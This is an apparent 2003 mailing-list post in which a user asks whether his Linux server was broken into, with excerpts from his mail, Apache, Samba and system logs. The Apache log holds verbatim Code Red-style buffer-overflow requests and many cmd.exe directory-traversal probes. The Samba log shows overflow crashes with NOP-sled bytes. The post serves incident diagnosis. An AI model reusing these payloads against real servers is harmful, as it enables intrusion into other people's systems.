Thanks for all the replies.
This email contains snips of my log files. There is some interesting reading, particularly the messages log. It seems a samba string overflow cause some problems from April 21 to 29 - scroll down to see the logs. Does this mean that a hacker has gotten control of my box?
In a number of replies people talk about a cracker, eh, what is a cracker? And what is the different with a hacker?
From: "Derek Fountain"
> Do you have any reason to believe a hardware fault has occured? Any history of
> overheating with that box? Has it received a knock recently which might have
> dislodged some memory? Any reason to think the hard disk might have started
> to die?
I have no reason whatsoever to suspect a hardware problem. No knocks, overheating etc.
> A reinstall looks like the best option in the absence of any better advice. My
> suspicions would lay with the hardware though. Happily running Linux boxes
> don't just go belly up like that without a good reason.
I think that I will reinstall the machine.
Rohit writes:
> I would have looked at /var/log/ directory and in relevant files there.
Thanks for this, would you suggest which file I should look at?
I looked at my mail log and guess what?
There is a huge whole in the log, everything from April 21 to 29 is gone.
Mail was running during that time.
Apparently deleted (???). Here is a snip of the log:
[snip]
Apr 21 18:00:34 linux sendmail[6307]: h3LG0Yd3006306: to=<root(a)linux.local>, ctladdr=<root(a)linux.local> (0/0), delay=00:00:00, xdelay=00:00:00, mailer=local, pri=31120, dsn=2.0.0, stat=Sent
Apr 29 09:50:09 linux sendmail-client[1040]: starting daemon (8.12.3): queueing@00:30:00
[/snip]
No data seems to be missing from the apache access log on April 21 6pm - but there seems to be some kind of hacking attempt at that time.
Here is a snip of that log:
[snip]
80.235.135.50 - - [21/Apr/2003:16:32:22 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 629
208.25.133.10 - - [21/Apr/2003:17:43:13 +0200] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 629
80.192.110.35 - - [21/Apr/2003:18:32:54 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:32:54 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:32:54 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:32:55 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:32:59 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:32:59 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:32:59 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:33:00 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:33:00 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:33:01 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:33:01 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:33:02 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
193.109.122.5 - - [21/Apr/2003:18:51:24 +0200] "CONNECT 193.109.122.7:2048/ HTTP/1.1" 400 340
80.224.123.79 - - [21/Apr/2003:20:40:23 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:14 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:14 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:15 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:15 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:15 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:15 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:17 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:17 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:18 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:18 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:19 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:19 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:19 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
80.14.34.82 - - [21/Apr/2003:20:55:20 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
80.14.34.82 - - [21/Apr/2003:20:55:20 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:21 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.201.159.40 - - [21/Apr/2003:21:52:29 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 629
80.62.154.229 - - [21/Apr/2003:22:38:13 +0200] "GET /personal/ HTTP/1.1" 401 477
[/snip]
Here is a snip from the samba log file (log.smbd) .
I don't understand all of this but there was activity on April 21 around 18pm
I don't recognise these ip addresses.
[snip]
[2003/04/21 18:04:16, 0] smbd/service.c:make_connection(249)
localhost (200.67.132.3) couldn't find service c
[2003/04/21 18:04:30, 0] smbd/service.c:make_connection(249)
localhost (80.24.226.55) couldn't find service c
[2003/04/21 18:18:39, 0] smbd/service.c:make_connection(249)
alevrius_ (200.56.254.70) couldn't find service c
[2003/04/21 18:20:24, 0] smbd/service.c:make_connection(249)
50163099sp (67.225.191.11) couldn't find service c
[2003/04/21 18:29:04, 0] smbd/service.c:make_connection(249)
50163099sp (62.56.130.23) couldn't find service c
[2003/04/21 18:44:17, 0] lib/fault.c:fault_report(38)
===============================================================
[2003/04/21 18:44:17, 0] lib/fault.c:fault_report(39)
INTERNAL ERROR: Signal 11 in pid 6353 (2.2.3a)
Please read the file BUGS.txt in the distribution
[2003/04/21 18:44:17, 0] lib/fault.c:fault_report(41)
===============================================================
[2003/04/21 18:44:17, 0] lib/util.c:smb_panic(1064)
PANIC: internal error
[2003/04/21 18:44:17, 0] lib/fault.c:fault_report(38)
===============================================================
[2003/04/21 18:44:17, 0] lib/fault.c:fault_report(39)
INTERNAL ERROR: Signal 11 in pid 6354 (2.2.3a)
Please read the file BUGS.txt in the distribution
[2003/04/21 18:44:17, 0] lib/fault.c:fault_report(41)
===============================================================
[2003/04/21 18:44:17, 0] lib/util.c:smb_panic(1064)
PANIC: internal error
[2003/04/21 18:44:17, 0] lib/fault.c:fault_report(38)
===============================================================
[2003/04/21 18:44:17, 0] lib/fault.c:fault_report(39)
INTERNAL ERROR: Signal 11 in pid 6355 (2.2.3a)
Please read the file BUGS.txt in the distribution
[2003/04/21 18:44:17, 0] lib/fault.c:fault_report(41)
===============================================================
[2003/04/21 18:44:17, 0] lib/util.c:smb_panic(1064)
PANIC: internal error
[2003/04/21 18:44:18, 0] lib/fault.c:fault_report(38)
===============================================================
[2003/04/21 18:44:18, 0] lib/fault.c:fault_report(39)
INTERNAL ERROR: Signal 11 in pid 6356 (2.2.3a)
Please read the file BUGS.txt in the distribution
[2003/04/21 18:44:18, 0] lib/fault.c:fault_report(41)
===============================================================
[2003/04/21 18:44:18, 0] lib/util.c:smb_panic(1064)
PANIC: internal error
[2003/04/21 18:44:18, 0] lib/fault.c:fault_report(38)
===============================================================
[2003/04/21 18:44:18, 0] lib/fault.c:fault_report(39)
INTERNAL ERROR: Signal 11 in pid 6360 (2.2.3a)
Please read the file BUGS.txt in the distribution
[2003/04/21 18:44:18, 0] lib/fault.c:fault_report(41)
===============================================================
[2003/04/21 18:44:18, 0] lib/util.c:smb_panic(1064)
PANIC: internal error
[2003/04/21 18:44:20, 0] lib/util_str.c:safe_strcpy(876)
ERROR: string overflow by 949 in safe_strcpy []
[2003/04/21 18:44:20, 0] lib/util_str.c:safe_strcpy(876)
ERROR: string overflow by 949 in safe_strcpy []
[2003/04/21 18:44:20, 0] lib/fault.c:fault_report(38)
===============================================================
[2003/04/21 18:44:20, 0] lib/fault.c:fault_report(39)
INTERNAL ERROR: Signal 11 in pid 6371 (2.2.3a)
Please read the file BUGS.txt in the distribution
[2003/04/21 18:44:20, 0] lib/fault.c:fault_report(41)
===============================================================
[2003/04/21 18:44:20, 0] lib/util.c:smb_panic(1064)
PANIC: internal error
[2003/04/21 18:44:20, 0] lib/fault.c:fault_report(38)
===============================================================
[2003/04/21 18:44:20, 0] lib/fault.c:fault_report(39)
INTERNAL ERROR: Signal 11 in pid 6373 (2.2.3a)
Please read the file BUGS.txt in the distribution
[2003/04/21 18:44:20, 0] lib/fault.c:fault_report(41)
===============================================================
[2003/04/21 18:44:20, 0] lib/util.c:smb_panic(1064)
PANIC: internal error
[2003/04/21 18:44:20, 0] lib/util_str.c:safe_strcpy(876)
ERROR: string overflow by 949 in safe_strcpy []
[2003/04/21 18:44:20, 0] lib/util_str.c:safe_strcpy(876)
ERROR: string overflow by 949 in safe_strcpy []
[2003/04/21 18:52:16, 0] smbd/service.c:make_connection(249)
localhost (61.217.123.231) couldn't find service c
[/snip]
More log reading, this time messages - this log shuts down April 21 and starts up April 29 - a samba string overflow seems to have caused a shut down.
[snip]
Apr 21 18:44:20 linux smbd[6373]: ===============================================================
Apr 21 18:44:20 linux smbd[6373]: [2003/04/21 18:44:20, 0] lib/fault.c:fault_report(39)
Apr 21 18:44:20 linux smbd[6373]: INTERNAL ERROR: Signal 11 in pid 6373 (2.2.3a)
Apr 21 18:44:20 linux smbd[6373]: Please read the file BUGS.txt in the distribution
Apr 21 18:44:20 linux smbd[6373]: [2003/04/21 18:44:20, 0] lib/fault.c:fault_report(41)
Apr 21 18:44:20 linux smbd[6373]: ===============================================================
Apr 21 18:44:20 linux smbd[6373]: [2003/04/21 18:44:20, 0] lib/util.c:smb_panic(1064)
Apr 21 18:44:20 linux smbd[6373]: PANIC: internal error
Apr 21 18:44:20 linux smbd[6373]:
Apr 21 18:44:20 linux smbd[6374]: [2003/04/21 18:44:20, 0] lib/util_str.c:safe_strcpy(876)
Apr 21 18:44:20 linux smbd[6374]: ERROR: string overflow by 949 in safe_strcpy [\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220]
Apr 21 18:44:20 linux smbd[6374]: [2003/04/21 18:44:20, 0] lib/util_str.c:safe_strcpy(876)
Apr 21 18:44:20 linux smbd[6374]: ERROR: string overflow by 949 in safe_strcpy [\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220]
Apr 29 09:46:25 linux syslogd 1.3-0: restart.
Apr 29 09:46:36 linux sshd[844]: Server listening on :: port 22.
Apr 29 09:46:37 linux webmin[843]: Webmin starting
Apr 29 09:46:44 linux /etc/hotplug/net.agent[846]: No HW description found ... exiting
Apr 29 09:50:08 linux init: Switching to runlevel: 6
Apr 29 09:50:09 linux /usr/sbin/cron[1029]: (CRON) STARTUP (fork ok)
Apr 29 09:52:30 linux syslogd 1.3-0: restart.
Apr 29 09:52:41 linux sshd[843]: Server listening on :: port 22.
Apr 29 09:52:43 linux webmin[842]: Webmin starting
[/snip]
Thanks in advance for any advice.
Dan